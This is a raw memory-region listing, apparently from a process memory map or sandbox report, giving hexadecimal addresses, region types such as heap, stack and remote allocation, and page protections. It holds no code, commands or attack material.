2E17000
heap
page read and write
4ACF000
trusted library allocation
page read and write
27DB6FB6000
heap
page read and write
34CD000
heap
page read and write
2936FFE000
unkown
page read and write
29812602000
heap
page read and write
182AE3AA000
heap
page read and write
56D1EFA000
stack
page read and write
29C1E693000
heap
page read and write
1AFAEB30000
heap
page read and write
573E1FF000
stack
page read and write
27DB6FAD000
heap
page read and write
27DB7024000
heap
page read and write
18E5A758000
heap
page read and write
18E5A751000
heap
page read and write
27DB7014000
heap
page read and write
18E5A745000
heap
page read and write
182AE342000
heap
page read and write
1EEDC288000
heap
page read and write
A697AFF000
stack
page read and write
1B09F2C0000
heap
page read and write
29C1E3A3000
heap
page read and write
29C1E229000
heap
page read and write
1F505C74000
heap
page read and write
29C1E729000
heap
page read and write
1B09F424000
heap
page read and write
29C1E2DF000
heap
page read and write
237F57CB000
heap
page read and write
1F505C74000
heap
page read and write
29C1E990000
heap
page read and write
231CEBC0000
trusted library allocation
page read and write
27DB6FAD000
heap
page read and write
18E5A81C000
heap
page read and write
32B0000
heap
page read and write
29C1E241000
heap
page read and write
1F505BEC000
heap
page read and write
1E1230F9000
heap
page read and write
7FFC23C60000
unkown
page readonly
1E122F70000
unkown
page readonly
27DB6E13000
heap
page read and write
29C1E729000
heap
page read and write
1C82BFA0000
trusted library allocation
page read and write
29C1C320000
heap
page read and write
7FF6FBF71000
unkown
page execute read
1EEDC243000
heap
page read and write
4D1FAFB000
stack
page read and write
27DB7043000
heap
page read and write
25708A5E000
heap
page read and write
18E5A834000
heap
page read and write
18E5ABAF000
heap
page read and write
27858D13000
heap
page read and write
27DB5099000
heap
page read and write
18E5AB3D000
heap
page read and write
231CDFB8000
heap
page read and write
29812678000
heap
page read and write
29C1E3D9000
heap
page read and write
1F505C6C000
heap
page read and write
257087F0000
heap
page read and write
27DB505C000
heap
page read and write
7FF7974EB000
unkown
page read and write
18E5AB8C000
heap
page read and write
27DB6E6D000
heap
page read and write
34D9000
heap
page read and write
29C1E45C000
heap
page read and write
29C1E729000
heap
page read and write
29C1C559000
heap
page read and write
34D9000
heap
page read and write
29C1E6E9000
heap
page read and write
BCE000
stack
page read and write
27DB7271000
heap
page read and write
18E5AA7A000
heap
page read and write
A91EB83000
stack
page read and write
221E5A10000
unkown
page readonly
7FF6FBF71000
unkown
page execute read
1840CB4B000
heap
page read and write
1AFAEC00000
heap
page read and write
27DB7026000
heap
page read and write
18E5AB3D000
heap
page read and write
257089E0000
heap
page read and write
29C1E66A000
heap
page read and write
29C1E3CE000
heap
page read and write
221E5A50000
heap
page read and write
25708C80000
heap
page read and write
18E5AB50000
heap
page read and write
7FF6FBF71000
unkown
page execute read
33B0000
heap
page read and write
27DB6F95000
heap
page read and write
27DB50CC000
heap
page read and write
18E5A644000
heap
page read and write
27DB7400000
heap
page read and write
29C1E981000
heap
page read and write
18E5A68A000
heap
page read and write
27DB6E27000
heap
page read and write
18E587E3000
heap
page read and write
29C1E3CA000
heap
page read and write
EE69EFD000
stack
page read and write
34CD000
heap
page read and write
2E01000
heap
page read and write
29C1E667000
heap
page read and write
18E5AB33000
heap
page read and write
34D1000
heap
page read and write
7FF79749A000
unkown
page readonly
18E5AB80000
heap
page read and write
2AC33660000
trusted library allocation
page read and write
18E5AC14000
heap
page read and write
2E0F000
heap
page read and write
29C1E333000
heap
page read and write
290320C0000
heap
page read and write
2E0A000
heap
page read and write
29C1E729000
heap
page read and write
7D0000
heap
page read and write
27DB7550000
heap
page read and write
27DB7341000
heap
page read and write
29C1E28D000
heap
page read and write
29812629000
heap
page read and write
32C0000
heap
page read and write
29C1C500000
heap
page read and write
18E58845000
heap
page read and write
29C1E229000
heap
page read and write
3675000
heap
page read and write
231CE365000
heap
page read and write
27DB7334000
heap
page read and write
29C1C557000
heap
page read and write
21271D69000
heap
page read and write
1EEDC276000
heap
page read and write
29C1E3CA000
heap
page read and write
27DB6E79000
heap
page read and write
A40000
heap
page read and write
390000
remote allocation
page read and write
29C1E45C000
heap
page read and write
310E000
stack
page read and write
C10000
trusted library allocation
page read and write
18E5A750000
heap
page read and write
221E5ACB000
heap
page read and write
2AC33033000
heap
page read and write
290320E0000
heap
page read and write
27DB7271000
heap
page read and write
29C1E676000
heap
page read and write
A91F0FE000
stack
page read and write
7FF64349A000
unkown
page readonly
2852F871000
heap
page read and write
29812590000
heap
page read and write
7FF642FB0000
unkown
page readonly
36C000
stack
page read and write
27DB72EC000
heap
page read and write
1AFAEB60000
trusted library allocation
page read and write
29C1E241000
heap
page read and write
1AFAEC4F000
heap
page read and write
1EEDCC13000
heap
page read and write
27DB75F5000
heap
page read and write
3231000
trusted library allocation
page read and write
27DB7340000
heap
page read and write
720000
remote allocation
page read and write
182AE397000
heap
page read and write
1B09F260000
heap
page read and write
29C1E718000
heap
page read and write
2D9E000
stack
page read and write
8B0000
heap
page read and write
27DB6E24000
heap
page read and write
18E5AA77000
heap
page read and write
1F505C54000
heap
page read and write
29C1C57B000
heap
page read and write
18E5ABAF000
heap
page read and write
29C1E3A2000
heap
page read and write
221E5AEB000
heap
page read and write
35DE000
stack
page read and write
18E5A69A000
heap
page read and write
527DCFF000
stack
page read and write
27DB733F000
heap
page read and write
29C1E3C2000
heap
page read and write
2719C2E5000
heap
page read and write
27DB7042000
heap
page read and write
2CCE000
stack
page read and write
34D1000
heap
page read and write
29C1E45D000
heap
page read and write
7FF6FC4AD000
unkown
page readonly
29C1C4FE000
heap
page read and write
27858D3A000
heap
page read and write
237F57E2000
heap
page read and write
29C1E3D9000
heap
page read and write
7FF6FC4A4000
unkown
page write copy
FA25A7E000
stack
page read and write
29C1E906000
heap
page read and write
18E5AB50000
heap
page read and write
1778217E000
heap
page read and write
34E2000
heap
page read and write
18E5ABC5000
heap
page read and write
C20000
heap
page read and write
1840D100000
heap
page read and write
18E5A64A000
heap
page read and write
2AC33041000
heap
page read and write
27DB5118000
heap
page read and write
1C82BB00000
heap
page read and write
29C1E50F000
heap
page read and write
7FF6FC4AD000
unkown
page readonly
29C1E72B000
heap
page read and write
2852F913000
heap
page read and write
CCF667B000
stack
page read and write
216AF460000
heap
page read and write
18E5A64C000
heap
page read and write
29C1E3A2000
heap
page read and write
527DEFE000
stack
page read and write
29C1E6BD000
heap
page read and write
EBBE1FE000
stack
page read and write
18E5A77C000
heap
page read and write
27DB729B000
heap
page read and write
29C1E4ED000
heap
page read and write
EBBDDFE000
stack
page read and write
29C1E360000
heap
page read and write
18E5AB50000
heap
page read and write
18E5AA71000
heap
page read and write
5CE000
stack
page read and write
29C1C542000
heap
page read and write
290322A0000
heap
page read and write
34C0000
heap
page read and write
A6975FF000
stack
page read and write
96E000
stack
page read and write
29C1E241000
heap
page read and write
2852F84C000
heap
page read and write
7FF796FB1000
unkown
page execute read
18E5A827000
heap
page read and write
303E000
stack
page read and write
29C1E354000
heap
page read and write
1840CB99000
heap
page read and write
7FF642FB1000
unkown
page execute read
29812670000
heap
page read and write
18E5A77C000
heap
page read and write
18E5A6CF000
heap
page read and write
1C82BA64000
heap
page read and write
221E5AD5000
heap
page read and write
221E5A87000
heap
page read and write
18E5A826000
heap
page read and write
34C0000
heap
page read and write
29C1E708000
heap
page read and write
221E5ACB000
heap
page read and write
29C1E3A2000
heap
page read and write
29C1C57B000
heap
page read and write
29C1E2BC000
heap
page read and write
18E5AB44000
heap
page read and write
1C82C002000
trusted library allocation
page read and write
2AC3302E000
heap
page read and write
29C1EA60000
heap
page read and write
2AC3307C000
heap
page read and write
29C1E321000
heap
page read and write
1EEDCB00000
heap
page read and write
2AC33062000
heap
page read and write
1EEDCC23000
heap
page read and write
18E587C6000
heap
page read and write
21271970000
unkown
page read and write
27DB733F000
heap
page read and write
29C1E39D000
heap
page read and write
27DB7024000
heap
page read and write
29C1C575000
heap
page read and write
18E5ABA0000
heap
page read and write
29C1E2E4000
heap
page read and write
1EEDCBB0000
heap
page read and write
5AAAF79000
stack
page read and write
1778213F000
heap
page read and write
18E5A755000
heap
page read and write
59D3FFF000
stack
page read and write
1C82BA62000
heap
page read and write
573E4FF000
stack
page read and write
18E5A81C000
heap
page read and write
27DB7328000
heap
page read and write
96F9FFF000
unkown
page read and write
29C1E3CE000
heap
page read and write
34C9000
heap
page read and write
B6D000
stack
page read and write
7FF6FC45A000
unkown
page readonly
27DB732E000
heap
page read and write
18E5A2C0000
heap
page read and write
18E5ABA4000
heap
page read and write
27DB7047000
heap
page read and write
18E5AB52000
heap
page read and write
323E000
stack
page read and write
EE6A9FF000
stack
page read and write
29C1E661000
heap
page read and write
EE6A5FE000
stack
page read and write
29C1C527000
heap
page read and write
29C1E3D1000
heap
page read and write
34D1000
heap
page read and write
9B0000
heap
page read and write
29C1E3DA000
heap
page read and write
17782035000
heap
page read and write
27DB6F98000
heap
page read and write
49C0000
trusted library allocation
page read and write
F9A787C000
stack
page read and write
29C1E3A2000
heap
page read and write
33D6000
heap
page read and write
316F000
heap
page read and write
806DCFF000
stack
page read and write
29C1E276000
heap
page read and write
18E5A66F000
heap
page read and write
25708950000
heap
page read and write
EE69DFE000
stack
page read and write
2852F710000
heap
page read and write
1EEDC200000
heap
page read and write
EE6A3FE000
stack
page read and write
27DB6FB3000
heap
page read and write
2E17000
heap
page read and write
21271A37000
heap
page read and write
2719C010000
heap
page read and write
18E5ABA0000
heap
page read and write
7FF7974E6000
unkown
page write copy
E0B419C000
stack
page read and write
18E5A826000
heap
page read and write
231CEC40000
trusted library allocation
page read and write
29C1E4ED000
heap
page read and write
25708C85000
heap
page read and write
18E5AA71000
heap
page read and write
7FF64349A000
unkown
page readonly
29C1E72B000
heap
page read and write
27DB6FE7000
heap
page read and write
29C1C5B9000
heap
page read and write
1B09F445000
heap
page read and write
18E5A81F000
heap
page read and write
1778216A000
heap
page read and write
A697CFF000
stack
page read and write
27DB7313000
heap
page read and write
18E5AB3A000
heap
page read and write
348E000
stack
page read and write
59D3EFE000
stack
page read and write
59D41FE000
stack
page read and write
18E5AB52000
heap
page read and write
29C1E674000
heap
page read and write
231CE001000
heap
page read and write
27DB6F90000
heap
page read and write
27DB6E7B000
heap
page read and write
2E17000
heap
page read and write
2D10000
heap
page read and write
29C1E72B000
heap
page read and write
CCF6AFF000
stack
page read and write
5D0000
trusted library allocation
page read and write
27DB6FA7000
heap
page read and write
2E0A000
heap
page read and write
E7C974D000
stack
page read and write
27DB6FAB000
heap
page read and write
3630000
trusted library allocation
page read and write
1E808A80000
unkown
page readonly
221E5A20000
unkown
page readonly
1778212C000
heap
page read and write
27DB72CD000
heap
page read and write
18E5AB31000
heap
page read and write
29C1E72B000
heap
page read and write
29C1E35E000
heap
page read and write
27DB6E3D000
heap
page read and write
A56000
heap
page read and write
27DB4FD0000
heap
page read and write
29C1E334000
heap
page read and write
221E5E19000
heap
page read and write
30E0000
heap
page read and write
29372FE000
stack
page read and write
29C1E97B000
heap
page read and write
7FFC23C77000
unkown
page readonly
6BD000
stack
page read and write
182AE160000
unkown
page readonly
29C1C516000
heap
page read and write
21271950000
unkown
page readonly
1E808A70000
unkown
page readonly
29C1E2AD000
heap
page read and write
17782020000
heap
page read and write
34E2000
heap
page read and write
18E5AB50000
heap
page read and write
18E5A730000
heap
page read and write
29C1E3D9000
heap
page read and write
29C1E4ED000
heap
page read and write
806DFF2000
stack
page read and write
C10000
trusted library allocation
page read and write
182B0230000
heap
page read and write
27DB7525000
heap
page read and write
18E5A77C000
heap
page read and write
27DB50A0000
heap
page read and write
2E0F000
heap
page read and write
27DB6F95000
heap
page read and write
27DB6E46000
heap
page read and write
30AF000
heap
page read and write
27DB6EEF000
heap
page read and write
27DB72AA000
heap
page read and write
29C1E2C6000
heap
page read and write
2AC33078000
heap
page read and write
29C1E6C0000
heap
page read and write
CCF6BFF000
stack
page read and write
231CEBD0000
trusted library allocation
page read and write
18E58800000
heap
page read and write
27DB4FF0000
heap
page read and write
1F507B80000
heap
page read and write
A91FAFE000
stack
page read and write
70E000
stack
page read and write
29C1E4ED000
heap
page read and write
2AC3305D000
heap
page read and write
27DB50B3000
heap
page read and write
29C1C56F000
heap
page read and write
1778217E000
heap
page read and write
18E5A734000
heap
page read and write
27DB7338000
heap
page read and write
18E5A6C3000
heap
page read and write
27DB7271000
heap
page read and write
21271960000
unkown
page readonly
28531330000
remote allocation
page read and write
29C1E240000
heap
page read and write
29C1E4DD000
heap
page read and write
7FFC23C61000
unkown
page execute read
34CD000
heap
page read and write
18E5A81C000
heap
page read and write
2852F88D000
heap
page read and write
27DB7026000
heap
page read and write
1E808A90000
unkown
page read and write
59D3DFF000
stack
page read and write
231CEE80000
trusted library allocation
page read and write
29C1E464000
heap
page read and write
29C1E4DD000
heap
page read and write
1840CB9A000
heap
page read and write
18E587DE000
heap
page read and write
29C1E373000
heap
page read and write
34CD000
heap
page read and write
27DB6FAC000
heap
page read and write
182AE3A7000
heap
page read and write
27DB7024000
heap
page read and write
27DB5095000
heap
page read and write
1C82BA28000
heap
page read and write
221E5A8D000
heap
page read and write
18E5A610000
heap
page read and write
29C1E4ED000
heap
page read and write
390000
remote allocation
page read and write
18E58750000
heap
page read and write
29C1E300000
heap
page read and write
315F000
heap
page read and write
1840CB80000
heap
page read and write
7FF7974ED000
unkown
page readonly
806D6FF000
stack
page read and write
FA2573C000
stack
page read and write
56D21F9000
stack
page read and write
18E5A827000
heap
page read and write
18E5AB48000
heap
page read and write
27DB7050000
heap
page read and write
18E5A77C000
heap
page read and write
29C1E738000
heap
page read and write
7FF796FB1000
unkown
page execute read
2E0F000
heap
page read and write
18E5A745000
heap
page read and write
27DB7047000
heap
page read and write
29C1DDB5000
heap
page read and write
221E5ACE000
heap
page read and write
18E5A835000
heap
page read and write
29C1E277000
heap
page read and write
18E5AB3D000
heap
page read and write
7FFC23560000
unkown
page readonly
29C1EB23000
heap
page read and write
A91FBFF000
stack
page read and write
27DB733F000
heap
page read and write
18E5A82F000
heap
page read and write
278584BB000
heap
page read and write
18E587D2000
heap
page read and write
29C1E244000
heap
page read and write
27DB7271000
heap
page read and write
27DB733F000
heap
page read and write
27DB6E13000
heap
page read and write
18E5A0E0000
heap
page read and write
18E5A77C000
heap
page read and write
5AAB0FF000
stack
page read and write
7FF6FC4A6000
unkown
page write copy
2852F780000
heap
page read and write
27DB7024000
heap
page read and write
7E0000
trusted library allocation
page read and write
A91F9FE000
stack
page read and write
7FF6FC357000
unkown
page readonly
27DB6E46000
heap
page read and write
18E587BD000
heap
page read and write
B90000
remote allocation
page read and write
18E5A81C000
heap
page read and write
221E5AD2000
heap
page read and write
27DB7271000
heap
page read and write
27DB509D000
heap
page read and write
27DB6E7F000
heap
page read and write
18E5AB3D000
heap
page read and write
2E01000
heap
page read and write
2AC33068000
heap
page read and write
18E5AB80000
heap
page read and write
A9201F8000
stack
page read and write
3159000
heap
page read and write
EE6A1FF000
stack
page read and write
29C1E26F000
heap
page read and write
18E5A826000
heap
page read and write
29C1E992000
heap
page read and write
29C1E68B000
heap
page read and write
2C50000
heap
page read and write
237F5775000
heap
page read and write
29C1C52A000
heap
page read and write
27858488000
heap
page read and write
806DDFE000
stack
page read and write
18E5A77D000
heap
page read and write
27DB6FBB000
heap
page read and write
2D10000
heap
page read and write
182AE32A000
heap
page read and write
1E123220000
heap
page read and write
D022F8B000
stack
page read and write
1F505E39000
heap
page read and write
18E5A743000
heap
page read and write
27DB7341000
heap
page read and write
29C1E816000
heap
page read and write
18E5A77C000
heap
page read and write
28531402000
trusted library allocation
page read and write
7FF642FB0000
unkown
page readonly
B8E000
stack
page read and write
27DB7024000
heap
page read and write
18E5A6BC000
heap
page read and write
2E0F000
heap
page read and write
29C1E661000
heap
page read and write
29031F80000
heap
page read and write
29C1C5B9000
heap
page read and write
27DB6F9B000
heap
page read and write
18E5A81F000
heap
page read and write
2AC33059000
heap
page read and write
18E587AD000
heap
page read and write
27DB729B000
heap
page read and write
29C1E45D000
heap
page read and write
29C1C545000
heap
page read and write
27DB751E000
heap
page read and write
56D207F000
stack
page read and write
27DB7278000
heap
page read and write
2AC33042000
heap
page read and write
182AE120000
heap
page read and write
18E5AB59000
heap
page read and write
27DB6F9B000
heap
page read and write
27DB6F9B000
heap
page read and write
27DB72BE000
heap
page read and write
2981263F000
heap
page read and write
18E587A2000
heap
page read and write
182AE38E000
heap
page read and write
18E58842000
heap
page read and write
29032100000
heap
page read and write
27DB7045000
heap
page read and write
32C6000
heap
page read and write
18E5A81C000
heap
page read and write
27DB737C000
heap
page read and write
1F505C47000
heap
page read and write
27DB6F9B000
heap
page read and write
2DF0000
remote allocation
page read and write
1AFAEAC0000
heap
page read and write
18E5A832000
heap
page read and write
29C1E2E0000
heap
page read and write
29C1E24F000
heap
page read and write
231CDFB0000
heap
page read and write
29C1E905000
heap
page read and write
285312B0000
trusted library allocation
page read and write
1840D105000
heap
page read and write
1C82B7E0000
heap
page read and write
1F505E30000
heap
page read and write
29C1E45C000
heap
page read and write
27DB7045000
heap
page read and write
18E5AAA2000
heap
page read and write
7FF6434ED000
unkown
page readonly
29C1E4ED000
heap
page read and write
29812530000
heap
page read and write
29C1E3C2000
heap
page read and write
29C1E661000
heap
page read and write
2AC33032000
heap
page read and write
29C1EA61000
heap
page read and write
18E5AB50000
heap
page read and write
27DB7031000
heap
page read and write
650000
heap
page read and write
27DB72F8000
heap
page read and write
21271910000
heap
page read and write
2E17000
heap
page read and write
29C1C52F000
heap
page read and write
1778213F000
heap
page read and write
29C1E488000
heap
page read and write
34D9000
heap
page read and write
29C1E354000
heap
page read and write
CCF66FE000
stack
page read and write
32C0000
remote allocation
page read and write
27DB703B000
heap
page read and write
1EEDC265000
heap
page read and write
29C1C51F000
heap
page read and write
29C1E724000
heap
page read and write
221E5A20000
unkown
page readonly
29C1E484000
heap
page read and write
27DB7438000
heap
page read and write
177820B0000
heap
page read and write
2E20000
heap
page read and write
21271A4B000
heap
page read and write
18E5AB2E000
heap
page read and write
1EEDC28C000
heap
page read and write
182AE559000
heap
page read and write
A69727C000
stack
page read and write
1778212F000
heap
page read and write
B90000
remote allocation
page read and write
237F5560000
heap
page read and write
18E5AB33000
heap
page read and write
29C1E667000
heap
page read and write
29C1E661000
heap
page read and write
31E0000
heap
page read and write
18E5ABCD000
heap
page read and write
27DB7052000
heap
page read and write
29C1E7E5000
heap
page read and write
29C1C450000
heap
page read and write
1F505C48000
heap
page read and write
BD0000
remote allocation
page read and write
27DB72C2000
heap
page read and write
29C1E251000
heap
page read and write
29C1E9D0000
heap
page read and write
1F505B60000
unkown
page readonly
920000
heap
page read and write
221E5C20000
heap
page read and write
18E5A75D000
heap
page read and write
27DB7036000
heap
page read and write
29C1EB1A000
heap
page read and write
1EEDCC00000
heap
page read and write
27DB7043000
heap
page read and write
2E17000
heap
page read and write
A697BFE000
stack
page read and write
18E5AA77000
heap
page read and write
29C1E669000
heap
page read and write
231CE360000
heap
page read and write
27DB6EB0000
heap
page read and write
29C1E276000
heap
page read and write
29812520000
heap
page read and write
1EEDCA02000
heap
page read and write
29C1E72B000
heap
page read and write
27DB6E21000
heap
page read and write
B00000
heap
page read and write
221E5A30000
unkown
page read and write
5B37AFF000
stack
page read and write
3370000
heap
page read and write
27DB72A2000
heap
page read and write
18E5A66A000
heap
page read and write
315B000
heap
page read and write
29C1E7F5000
heap
page read and write
34C9000
heap
page read and write
374C67E000
stack
page read and write
18E5A82D000
heap
page read and write
29C1E28F000
heap
page read and write
1F505B80000
heap
page read and write
29C1C513000
heap
page read and write
27DB7348000
heap
page read and write
18E5A81C000
heap
page read and write
7FF6FBF70000
unkown
page readonly
1EEDC060000
heap
page read and write
C00000
trusted library allocation
page read and write
27DB7399000
heap
page read and write
27DB50A9000
heap
page read and write
5AAABAC000
stack
page read and write
27DB702A000
heap
page read and write
45922FE000
stack
page read and write
1F505C13000
heap
page read and write
7FF6434E4000
unkown
page write copy
18E5A626000
heap
page read and write
29C1E3CF000
heap
page read and write
27DB7036000
heap
page read and write
27DB6FBB000
heap
page read and write
27DB6EB1000
heap
page read and write
18E5AA77000
heap
page read and write
1E808C2A000
heap
page read and write
4D1FDFE000
stack
page read and write
27DB702D000
heap
page read and write
2AC32E90000
heap
page read and write
27DB6F95000
heap
page read and write
18E5A6FC000
heap
page read and write
182AE310000
heap
page read and write
EE6AAFE000
stack
page read and write
1B09F400000
heap
page read and write
27DB743E000
heap
page read and write
7FF6434E4000
unkown
page write copy
56D24FE000
stack
page read and write
29C1E95B000
heap
page read and write
374C87F000
stack
page read and write
B20000
heap
page read and write
3060000
trusted library allocation
page read and write
18E5AB50000
heap
page read and write
1EEDCC30000
heap
page read and write
27DB7277000
heap
page read and write
18E5A6FA000
heap
page read and write
28531330000
remote allocation
page read and write
18E5AA70000
heap
page read and write
231CEE90000
heap
page readonly
2AC33802000
trusted library allocation
page read and write
2E17000
heap
page read and write
18E5A77C000
heap
page read and write
27DB7024000
heap
page read and write
BF0000
remote allocation
page read and write
1C82BA00000
heap
page read and write
2E0F000
heap
page read and write
29C1E45C000
heap
page read and write
1B09F3C0000
trusted library allocation
page read and write
17782160000
heap
page read and write
1EEDC070000
heap
page read and write
29C1E223000
heap
page read and write
1E122F80000
unkown
page read and write
27DB6E54000
heap
page read and write
29C1E3D9000
heap
page read and write
78E000
stack
page read and write
231CE001000
heap
page read and write
A697DFF000
stack
page read and write
3230000
trusted library allocation
page read and write
182AE160000
unkown
page readonly
18E5AA79000
heap
page read and write
278583C0000
heap
page read and write
29C1E354000
heap
page read and write
27DB50D0000
heap
page read and write
1778216A000
heap
page read and write
29C1E936000
heap
page read and write
18E5AC3D000
heap
page read and write
29C1E334000
heap
page read and write
27DB751E000
heap
page read and write
18E5AAAC000
heap
page read and write
27DB6E21000
heap
page read and write
29C1E803000
heap
page read and write
29C1E661000
heap
page read and write
F6F377F000
stack
page read and write
18E5AB21000
heap
page read and write
1F505C4C000
heap
page read and write
29C1E35E000
heap
page read and write
1B09F502000
heap
page read and write
29C1C4C0000
heap
page read and write
18E5AB8C000
heap
page read and write
E7C9AFF000
unkown
page read and write
2C66000
heap
page read and write
2AC3305B000
heap
page read and write
1B09F448000
heap
page read and write
1840CB9A000
heap
page read and write
18E587AE000
heap
page read and write
29C1C55D000
heap
page read and write
182AE396000
heap
page read and write
1E122F70000
unkown
page readonly
CCF68FE000
stack
page read and write
2852F82A000
heap
page read and write
29032108000
heap
page read and write
1F505C91000
heap
page read and write
E0B447F000
stack
page read and write
278583F0000
trusted library allocation
page read and write
182AE397000
heap
page read and write
7FF643397000
unkown
page readonly
2AC33013000
heap
page read and write
29C1E326000
heap
page read and write
29C1E315000
heap
page read and write
C0E000
stack
page read and write
29C1E334000
heap
page read and write
1840CB40000
heap
page read and write
18E5AB16000
heap
page read and write
27DB6FBF000
heap
page read and write
1F505B50000
unkown
page readonly
278584E7000
heap
page read and write
34CD000
heap
page read and write
1AFAED02000
heap
page read and write
231CDFF9000
heap
page read and write
2719C250000
heap
page read and write
806DAFE000
stack
page read and write
1EEDC229000
heap
page read and write
237F57E5000
heap
page read and write
29C1E357000
heap
page read and write
1C82BA3C000
heap
page read and write
2DE7000
heap
page read and write
EE6ACF8000
stack
page read and write
316F000
heap
page read and write
2C57000
heap
page read and write
2852F868000
heap
page read and write
29C1E6FE000
heap
page read and write
18E5A81C000
heap
page read and write
29C1E484000
heap
page read and write
216AF4E7000
heap
page read and write
29C1E335000
heap
page read and write
33CE000
heap
page read and write
18E5AB33000
heap
page read and write
28531330000
remote allocation
page read and write
29C1E901000
heap
page read and write
221E5A6B000
heap
page read and write
221E5A93000
heap
page read and write
7FF797397000
unkown
page readonly
33EF000
stack
page read and write
29C1E24F000
heap
page read and write
29C1E744000
heap
page read and write
29C1E39D000
heap
page read and write
5B37BFA000
stack
page read and write
29C1E464000
heap
page read and write
27DB704E000
heap
page read and write
29C1E8E2000
heap
page read and write
34C9000
heap
page read and write
7FF642FB1000
unkown
page execute read
27DB6E90000
heap
page read and write
1EEDCB22000
heap
page read and write
2AC33043000
heap
page read and write
27DB6FBF000
heap
page read and write
27DB6FB5000
heap
page read and write
29C1E732000
heap
page read and write
21271A4E000
heap
page read and write
EBBDEFF000
stack
page read and write
27DB4EF0000
remote allocation
page read and write
29812667000
heap
page read and write
18E5A6FC000
heap
page read and write
1B09F429000
heap
page read and write
29C1E354000
heap
page read and write
56D257E000
stack
page read and write
27DB50E0000
heap
page read and write
33C0000
heap
page read and write
1F505C54000
heap
page read and write
1E808C10000
heap
page read and write
18E5A81F000
heap
page read and write
29C1E3CF000
heap
page read and write
2AC33033000
heap
page read and write
29C1C5BC000
heap
page read and write
7FFC23C75000
unkown
page readonly
2DE0000
heap
page read and write
278584CA000
heap
page read and write
29812702000
heap
page read and write
29C1E230000
heap
page read and write
806D1FE000
stack
page read and write
18E5AABB000
heap
page read and write
29C1E32D000
heap
page read and write
29C1E708000
heap
page read and write
29C1E45C000
heap
page read and write
29C1E7A5000
heap
page read and write
27DB6EEF000
heap
page read and write
3240000
heap
page read and write
18E5A82A000
heap
page read and write
18E5AB39000
heap
page read and write
7FF6FBF70000
unkown
page readonly
3167000
heap
page read and write
2DA0000
heap
page read and write
303E000
stack
page read and write
5B37CFA000
stack
page read and write
29C1E2E4000
heap
page read and write
29C1C57C000
heap
page read and write
18E5A75A000
heap
page read and write
29C1E2DE000
heap
page read and write
1E808D10000
heap
page read and write
27DB7328000
heap
page read and write
27DB6E2E000
heap
page read and write
2AC33102000
heap
page read and write
18E586F0000
heap
page read and write
29C1E3DA000
heap
page read and write
18E5A6FC000
heap
page read and write
5AAAFF9000
stack
page read and write
1EEDC313000
heap
page read and write
182AE353000
heap
page read and write
1F505C6A000
heap
page read and write
29C1E224000
heap
page read and write
27DB6E7B000
heap
page read and write
182AE3D0000
heap
page read and write
237F5804000
heap
page read and write
1778213B000
heap
page read and write
D0235FE000
stack
page read and write
27DB733F000
heap
page read and write
18E5AB52000
heap
page read and write
27DB5118000
heap
page read and write
27DB7047000
heap
page read and write
27DB7026000
heap
page read and write
29C1E32B000
heap
page read and write
237F57E2000
heap
page read and write
1F505C53000
heap
page read and write
BC0000
remote allocation
page read and write
2852F720000
heap
page read and write
18E5AB5C000
heap
page read and write
7FF6FC4AB000
unkown
page read and write
29C1E729000
heap
page read and write
CCF69FE000
stack
page read and write
A9203F8000
stack
page read and write
27DB703C000
heap
page read and write
18E5AC46000
heap
page read and write
18E5AA71000
heap
page read and write
2852F85C000
heap
page read and write
18E5AB50000
heap
page read and write
B40E3AD000
stack
page read and write
18E5A82E000
heap
page read and write
27DB6FC6000
heap
page read and write
29C1E3DA000
heap
page read and write
18E5AAA2000
heap
page read and write
1EEDCC27000
heap
page read and write
17782090000
heap
page read and write
1EEDCB22000
heap
page read and write
30B6000
heap
page read and write
221E5D40000
heap
page read and write
29C1E661000
heap
page read and write
18E5A638000
heap
page read and write
27DB6F9C000
heap
page read and write
231CDFC0000
heap
page read and write
18E5AB50000
heap
page read and write
21271950000
unkown
page readonly
29C1E2E4000
heap
page read and write
27DB7027000
heap
page read and write
29C1E46C000
heap
page read and write
18E5A81C000
heap
page read and write
18E5AB41000
heap
page read and write
18E5AA87000
heap
page read and write
EC3A2FD000
stack
page read and write
7FF6FC4AD000
unkown
page readonly
216AF440000
heap
page read and write
1F505C6D000
heap
page read and write
2D8E000
stack
page read and write
29C1E355000
heap
page read and write
27DB6FBF000
heap
page read and write
182AE559000
heap
page read and write
720000
remote allocation
page read and write
1E808A30000
heap
page read and write
B2D000
stack
page read and write
7FFC23C60000
unkown
page readonly
27DB733D000
heap
page read and write
221E5B11000
heap
page read and write
231CDF30000
heap
page read and write
27DB7024000
heap
page read and write
7FF6434ED000
unkown
page readonly
27DB6E7E000
heap
page read and write
27DB7341000
heap
page read and write
2719C150000
heap
page read and write
18E5A64A000
heap
page read and write
29C1E3D9000
heap
page read and write
18E5ACEA000
heap
page read and write
29C1E729000
heap
page read and write
29C1C528000
heap
page read and write
27DB6F9B000
heap
page read and write
F9A73FC000
stack
page read and write
29C1E25D000
heap
page read and write
27DB6E34000
heap
page read and write
806D2FE000
stack
page read and write
27DB6FC6000
heap
page read and write
2E20000
heap
page read and write
18E5AA71000
heap
page read and write
1E12313A000
heap
page read and write
B20000
trusted library allocation
page read and write
29C1E6B2000
heap
page read and write
29C1E667000
heap
page read and write
237F5770000
heap
page read and write
182AE346000
heap
page read and write
29C1E207000
heap
page read and write
27DB6FBD000
heap
page read and write
1EEDCB02000
heap
page read and write
221E5ACA000
heap
page read and write
18E5A822000
heap
page read and write
18E58842000
heap
page read and write
18E5AB41000
heap
page read and write
7FF797397000
unkown
page readonly
2852F802000
heap
page read and write
29812666000
heap
page read and write
56D22FA000
stack
page read and write
7FF6FBF70000
unkown
page readonly
182AE170000
unkown
page readonly
18E5A824000
heap
page read and write
1E808C19000
heap
page read and write
27DB6FAC000
heap
page read and write
1E808BB0000
heap
page read and write
4ED000
stack
page read and write
34A0000
heap
page read and write
18E5A77C000
heap
page read and write
29C1E240000
heap
page read and write
1F505C54000
heap
page read and write
29C1E2BD000
heap
page read and write
1EEDCB12000
heap
page read and write
7FF6FC357000
unkown
page readonly
27DB50BA000
heap
page read and write
EBBDFFF000
stack
page read and write
182AE555000
heap
page read and write
18E5ABDA000
heap
page read and write
29C1E355000
heap
page read and write
5AAB179000
stack
page read and write
27DB6E27000
heap
page read and write
27858502000
heap
page read and write
182AE38C000
heap
page read and write
18E5AC3D000
heap
page read and write
550000
remote allocation
page read and write
30A0000
heap
page read and write
27DB6E2E000
heap
page read and write
18E5AA71000
heap
page read and write
18E5AB50000
heap
page read and write
18E5AC46000
heap
page read and write
182AE180000
unkown
page read and write
18E5AD2A000
heap
page read and write
2852F84C000
heap
page read and write
18E5A63E000
heap
page read and write
27DB7525000
heap
